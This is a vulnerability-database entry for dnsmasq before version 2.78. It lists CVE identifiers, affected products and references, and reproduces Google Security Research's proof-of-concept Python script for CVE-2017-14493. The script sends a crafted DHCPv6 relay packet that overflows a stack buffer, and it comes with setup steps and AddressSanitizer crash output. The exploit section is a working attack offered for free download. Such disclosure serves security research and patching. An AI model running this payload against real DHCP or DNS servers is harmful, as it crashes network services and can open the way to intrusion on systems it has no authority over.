ID
VAR-E-201710-0640
CVE
cve_id: | CVE-2017-14493 | Trust: 1.8 |
cve_id: | CVE-2017-14494 | Trust: 0.8 |
cve_id: | CVE-2017-14495 | Trust: 0.8 |
cve_id: | CVE-2017-14492 | Trust: 0.8 |
cve_id: | CVE-2017-14496 | Trust: 0.8 |
cve_id: | CVE-2017-14491 | Trust: 0.8 |
cve_id: | CVE-2017-13704 | Trust: 0.3 |
EDB ID
42943
TITLE
Dnsmasq < 2.78 - Stack Overflow - Multiple dos Exploit
Trust: 0.6
DESCRIPTION
Dnsmasq < 2.78 - Stack Overflow. CVE-2017-14493 . dos exploit for Multiple platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | dnsmasq | model: | - | scope: | lt | version: | 2.78 | Trust: 4.6 |
vendor: | redhat | model: | enterprise linux server year extended update support | scope: | eq | version: | -47.4 | Trust: 0.6 |
vendor: | dnsmasq | model: | lack of free | scope: | - | version: | - | Trust: 0.5 |
vendor: | dnsmasq | model: | stack-based | scope: | - | version: | - | Trust: 0.5 |
vendor: | dnsmasq | model: | integer underflow | scope: | - | version: | - | Trust: 0.5 |
vendor: | dnsmasq | model: | information leak | scope: | - | version: | - | Trust: 0.5 |
vendor: | dnsmasq | model: | 2-byte heap-based | scope: | - | version: | - | Trust: 0.5 |
vendor: | dnsmasq | model: | heap-based | scope: | - | version: | - | Trust: 0.5 |
vendor: | ubuntu | model: | linux | scope: | eq | version: | 17.04 | Trust: 0.3 |
vendor: | ubuntu | model: | linux lts | scope: | eq | version: | 16.04 | Trust: 0.3 |
vendor: | ubuntu | model: | linux lts | scope: | eq | version: | 14.04 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.2.2 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.77 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.75 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.72 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.71 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.70 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.7 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.65 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.64 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.63 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.62 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.61 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.60 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.6 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.59 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.58 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.57 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.56 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.55 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.54 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.53 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.52 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.51 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.50 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.49 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.48 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.47 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.46 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.45 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.44 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.43 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.42 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.41 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.40 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.4 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.38 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.37 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.36 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.35 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.34 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.33 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.30 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.29 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.28 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.27 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.26 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.25 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.24 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.23 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.22 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.21 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.20 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.2 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.19 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.18 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.17 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.16 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.15 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.14 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.13 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.12 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.11 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 2.10 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.9 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.8 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.6 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.5 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.4 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.3 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.18 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.17 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.16 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.15 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.14 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.13 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.12 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.11 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.10 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 1.0 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 0.996 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 0.992 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 0.98 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 0.96 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 0.95 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 0.7 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 0.6 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 0.5 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | eq | version: | 0.4 | Trust: 0.3 |
vendor: | slackware | model: | linux | scope: | eq | version: | 14.2 | Trust: 0.3 |
vendor: | slackware | model: | linux | scope: | eq | version: | 14.1 | Trust: 0.3 |
vendor: | slackware | model: | linux | scope: | eq | version: | 14.0 | Trust: 0.3 |
vendor: | slackware | model: | linux | scope: | eq | version: | 13.37 | Trust: 0.3 |
vendor: | slackware | model: | linux | scope: | eq | version: | 13.1 | Trust: 0.3 |
vendor: | slackware | model: | linux | scope: | eq | version: | 13.0 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux workstation optional | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux workstation optional | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux workstation | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux workstation | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server tus | scope: | eq | version: | 6.6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server tus | scope: | eq | version: | 6.5 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server optional eus | scope: | eq | version: | 7.3 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server optional eus | scope: | eq | version: | 7.2 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server optional eus | scope: | eq | version: | 6.5 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server optional aus | scope: | eq | version: | 6.6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server optional aus | scope: | eq | version: | 6.5 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server optional aus | scope: | eq | version: | 6.4 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server optional | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server optional | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server for arm | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server eus | scope: | eq | version: | 7.3 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server eus | scope: | eq | version: | 7.2 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server aus | scope: | eq | version: | 6.6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server aus | scope: | eq | version: | 6.5 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server aus | scope: | eq | version: | 6.4 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server aus | scope: | eq | version: | 6.2 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server tus | scope: | eq | version: | -7.4 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server tus | scope: | eq | version: | -7.3 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server tus | scope: | eq | version: | -7.2 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server extended update support | scope: | eq | version: | -7.4 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server extended update support | scope: | eq | version: | -7.2 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server extended update suppor | scope: | eq | version: | -7.3 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server aus | scope: | eq | version: | -7.4 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server aus | scope: | eq | version: | -7.3 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server aus | scope: | eq | version: | -7.2 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server year extended update support | scope: | eq | version: | -47.2 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server year extended upd | scope: | eq | version: | -47.3 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server | scope: | eq | version: | 5 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux long life server | scope: | eq | version: | 5.9 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux hpc node optional | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux hpc node | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux for scientific computing | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux for power little endian extended update supp | scope: | eq | version: | -7.4 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux for power little endian | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux for power big endian extended update support | scope: | eq | version: | -7.4 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux for power big endian | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux for power little endian extended update suppo | scope: | eq | version: | -7.3 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux for power little endian extended update suppo | scope: | eq | version: | -7.2 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux for power big endian extended update support | scope: | eq | version: | -7.3 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux for power big endian extended update support | scope: | eq | version: | -7.2 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux for ibm z systems extended update support | scope: | eq | version: | -7.4 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux for ibm z systems extended update support | scope: | eq | version: | -7.3 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux for ibm z systems extended update support | scope: | eq | version: | -7.2 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux for ibm z systems | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux eus compute node | scope: | eq | version: | 7.4 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux eus compute node | scope: | eq | version: | 7.3 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux eus compute node | scope: | eq | version: | 7.2 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux desktop optional | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux desktop | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux desktop | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux computenode optional eus | scope: | eq | version: | 7.3 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux computenode optional eus | scope: | eq | version: | 7.2 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux computenode optional | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux computenode eus | scope: | eq | version: | 7.3 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux computenode eus | scope: | eq | version: | 7.2 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux computenode | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | oracle | model: | linux | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | oracle | model: | linux | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | opensuse | model: | leap | scope: | eq | version: | 42.3 | Trust: 0.3 |
vendor: | opensuse | model: | leap | scope: | eq | version: | 42.2 | Trust: 0.3 |
vendor: | kubernetes | model: | kubernetes | scope: | eq | version: | 1.7.6 | Trust: 0.3 |
vendor: | kubernetes | model: | kubernetes | scope: | eq | version: | 1.7 | Trust: 0.3 |
vendor: | kubernetes | model: | kubernetes | scope: | eq | version: | 1.6.10 | Trust: 0.3 |
vendor: | kubernetes | model: | kubernetes | scope: | eq | version: | 1.6 | Trust: 0.3 |
vendor: | kubernetes | model: | kubernetes | scope: | eq | version: | 1.5.7 | Trust: 0.3 |
vendor: | kubernetes | model: | kubernetes | scope: | eq | version: | 1.5 | Trust: 0.3 |
vendor: | kubernetes | model: | kubernetes | scope: | eq | version: | 1.2 | Trust: 0.3 |
vendor: | model: | android | scope: | eq | version: | 7.1.1 | Trust: 0.3 | |
vendor: | model: | android | scope: | eq | version: | 6.0.1 | Trust: 0.3 | |
vendor: | model: | android | scope: | eq | version: | 5.1.1 | Trust: 0.3 | |
vendor: | model: | android | scope: | eq | version: | 5.0.2 | Trust: 0.3 | |
vendor: | model: | android | scope: | eq | version: | 4.4.4 | Trust: 0.3 | |
vendor: | model: | android | scope: | eq | version: | 8.0 | Trust: 0.3 | |
vendor: | model: | android | scope: | eq | version: | 7.1.2 | Trust: 0.3 | |
vendor: | model: | android | scope: | eq | version: | 7.0 | Trust: 0.3 | |
vendor: | model: | android | scope: | eq | version: | 6.0 | Trust: 0.3 | |
vendor: | fedoraproject | model: | fedora | scope: | eq | version: | 27 | Trust: 0.3 |
vendor: | debian | model: | linux sparc | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux s/390 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux powerpc | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux mips | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux ia-64 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux ia-32 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux ia-30 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux arm | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux amd64 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | centos | model: | centos | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | centos | model: | centos | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | thekelleys | model: | dnsmasq | scope: | ne | version: | 2.78 | Trust: 0.3 |
vendor: | kubernetes | model: | kubernetes | scope: | ne | version: | 1.8 | Trust: 0.3 |
vendor: | kubernetes | model: | kubernetes | scope: | ne | version: | 1.7.7 | Trust: 0.3 |
vendor: | kubernetes | model: | kubernetes | scope: | ne | version: | 1.6.11 | Trust: 0.3 |
vendor: | kubernetes | model: | kubernetes | scope: | ne | version: | 1.5.8 | Trust: 0.3 |
EXPLOIT
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14493.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
1) Build the docker and open two terminals
docker build -t dnsmasq .
docker run --rm -t -i --name dnsmasq_test dnsmasq bash
docker cp poc.py dnsmasq_test:/poc.py
docker exec -it <container_id> bash
2) On one terminal start dnsmasq:
# /test/dnsmasq_noasn/src/dnsmasq --no-daemon --dhcp-range=fd00::2,fd00::ff
dnsmasq: started, version 2.78test2-8-ga3303e1 cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth no-DNSSEC loop-detect inotify
dnsmasq-dhcp: DHCPv6, IP range fd00::2 -- fd00::ff, lease time 1h
dnsmasq: reading /etc/resolv.conf
dnsmasq: using nameserver 8.8.8.8#53
dnsmasq: using nameserver 8.8.4.4#53
dnsmasq: read /etc/hosts - 7 addresses
3) On another terminal start the PoC:
# python /poc.py ::1 547
[+] sending 70 bytes to ::1:547
4) Dnsmasq will output the following: Segmentation fault (core dumped)
==33==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffcbef81470 at pc 0x0000004b5408 bp 0x7ffcbef81290 sp 0x7ffcbef80a40
WRITE of size 30 at 0x7ffcbef81470 thread T0
#0 0x4b5407 in __asan_memcpy (/test/dnsmasq/src/dnsmasq+0x4b5407)
#1 0x575d38 in dhcp6_maybe_relay /test/dnsmasq/src/rfc3315.c:211:7
#2 0x575378 in dhcp6_reply /test/dnsmasq/src/rfc3315.c:103:7
#3 0x571080 in dhcp6_packet /test/dnsmasq/src/dhcp6.c:233:14
#4 0x544a82 in main /test/dnsmasq/src/dnsmasq.c:1061:2
#5 0x7f93e5da62b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
#6 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
Address 0x7ffcbef81470 is located in stack of thread T0 at offset 208 in frame
#0 0x57507f in dhcp6_reply /test/dnsmasq/src/rfc3315.c:78
This frame has 1 object(s):
[32, 208) 'state' <== Memory access at offset 208 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow (/test/dnsmasq/src/dnsmasq+0x4b5407) in __asan_memcpy
Shadow bytes around the buggy address:
0x100017de8230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100017de8240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100017de8250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100017de8260: f1 f1 f1 f1 00 00 f3 f3 00 00 00 00 00 00 00 00
0x100017de8270: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00
=>0x100017de8280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[f3]f3
0x100017de8290: f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00
0x100017de82a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100017de82b0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
0x100017de82c0: 00 00 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2 f2
0x100017de82d0: 00 00 00 00 00 00 00 f2 f2 f2 f2 f2 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==33==ABORTING
'''
#!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwind <gynvael@google.com>
# Ron Bowes - Xoogler :/
from struct import pack
import sys
import socket
def send_packet(data, host, port):
print("[+] sending {} bytes to {}:{}".format(len(data), host, port))
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, len(data))
if s.sendto(data, (host, port)) != len(data):
print("[!] Could not send (full) payload")
s.close()
def u8(x):
return pack("B", x)
def u16(x):
return pack("!H", x)
def gen_option(option, data, length=None):
if length is None:
length = len(data)
return b"".join([
u16(option),
u16(length),
data
])
if __name__ == '__main__':
assert len(sys.argv) == 3, "{} <ip> <port>".format(sys.argv[0])
pkg = b"".join([
u8(12), # DHCP6RELAYFORW
u16(0x0313), u8(0x37), # transaction ID
b"_" * (34 - 4),
# Option 79 = OPTION6_CLIENT_MAC
# Moves argument into char[DHCP_CHADDR_MAX], DHCP_CHADDR_MAX = 16
gen_option(79, "A" * 74 + pack("<Q", 0x1337DEADBEEF)),
])
host, port = sys.argv[1:]
send_packet(pkg, host, int(port))
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
overflow
Trust: 1.5
TAGS
tag: | exploit | Trust: 3.0 |
tag: | overflow | Trust: 1.5 |
tag: | denial of service | Trust: 0.5 |
tag: | info disclosure | Trust: 0.5 |
CREDITS
Google Security Research
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2017-14493 | Trust: 3.0 |
db: | EXPLOIT-DB | id: | 42943 | Trust: 1.6 |
db: | NVD | id: | CVE-2017-14494 | Trust: 1.4 |
db: | NVD | id: | CVE-2017-14495 | Trust: 1.4 |
db: | NVD | id: | CVE-2017-14492 | Trust: 1.4 |
db: | NVD | id: | CVE-2017-14496 | Trust: 1.4 |
db: | NVD | id: | CVE-2017-14491 | Trust: 0.8 |
db: | EDBNET | id: | 94397 | Trust: 0.6 |
db: | 0DAYTODAY | id: | 28724 | Trust: 0.6 |
db: | EDBNET | id: | 94654 | Trust: 0.6 |
db: | 0DAYTODAY | id: | 28727 | Trust: 0.6 |
db: | EDBNET | id: | 94657 | Trust: 0.6 |
db: | 0DAYTODAY | id: | 28726 | Trust: 0.6 |
db: | EDBNET | id: | 94656 | Trust: 0.6 |
db: | 0DAYTODAY | id: | 28725 | Trust: 0.6 |
db: | EDBNET | id: | 94655 | Trust: 0.6 |
db: | 0DAYTODAY | id: | 28723 | Trust: 0.6 |
db: | EDBNET | id: | 94653 | Trust: 0.6 |
db: | PACKETSTORM | id: | 144468 | Trust: 0.5 |
db: | PACKETSTORM | id: | 144473 | Trust: 0.5 |
db: | PACKETSTORM | id: | 144462 | Trust: 0.5 |
db: | PACKETSTORM | id: | 144471 | Trust: 0.5 |
db: | PACKETSTORM | id: | 144480 | Trust: 0.5 |
db: | PACKETSTORM | id: | 144479 | Trust: 0.5 |
db: | NVD | id: | CVE-2017-13704 | Trust: 0.3 |
db: | CERT/CC | id: | VU#973527 | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-17-332-01 | Trust: 0.3 |
db: | BID | id: | 101085 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2017-14493 | Trust: 1.5 |
url: | https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/cve-2017-14493.py | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/42943/ | Trust: 0.6 |
url: | https://0day.today/exploits/28724 | Trust: 0.6 |
url: | https://0day.today/exploits/28727 | Trust: 0.6 |
url: | https://0day.today/exploits/28726 | Trust: 0.6 |
url: | https://0day.today/exploits/28725 | Trust: 0.6 |
url: | https://0day.today/exploits/28723 | Trust: 0.6 |
url: | https://nvd.nist.gov/vuln/detail/cve-2017-14495 | Trust: 0.5 |
url: | https://nvd.nist.gov/vuln/detail/cve-2017-14496 | Trust: 0.5 |
url: | https://nvd.nist.gov/vuln/detail/cve-2017-14494 | Trust: 0.5 |
url: | https://nvd.nist.gov/vuln/detail/cve-2017-14491 | Trust: 0.5 |
url: | https://nvd.nist.gov/vuln/detail/cve-2017-14492 | Trust: 0.5 |
url: | https://github.com/google/security-research-pocs/blob/master/vulnerabilities/dnsmasq/cve-2017-14492.py | Trust: 0.3 |
url: | https://access.redhat.com/security/cve/cve-2017-14495 | Trust: 0.3 |
url: | https://github.com/google/security-research-pocs/blob/master/vulnerabilities/dnsmasq/cve-2017-14494.py | Trust: 0.3 |
url: | https://access.redhat.com/errata/rhsa-2017:2836 | Trust: 0.3 |
url: | https://access.redhat.com/security/cve/cve-2017-14491 | Trust: 0.3 |
url: | https://source.android.com/security/bulletin/2017-10-01 | Trust: 0.3 |
url: | https://ics-cert.us-cert.gov/advisories/icsa-17-332-01 | Trust: 0.3 |
url: | https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html | Trust: 0.3 |
url: | https://bugzilla.redhat.com/show_bug.cgi?id=1495411 | Trust: 0.3 |
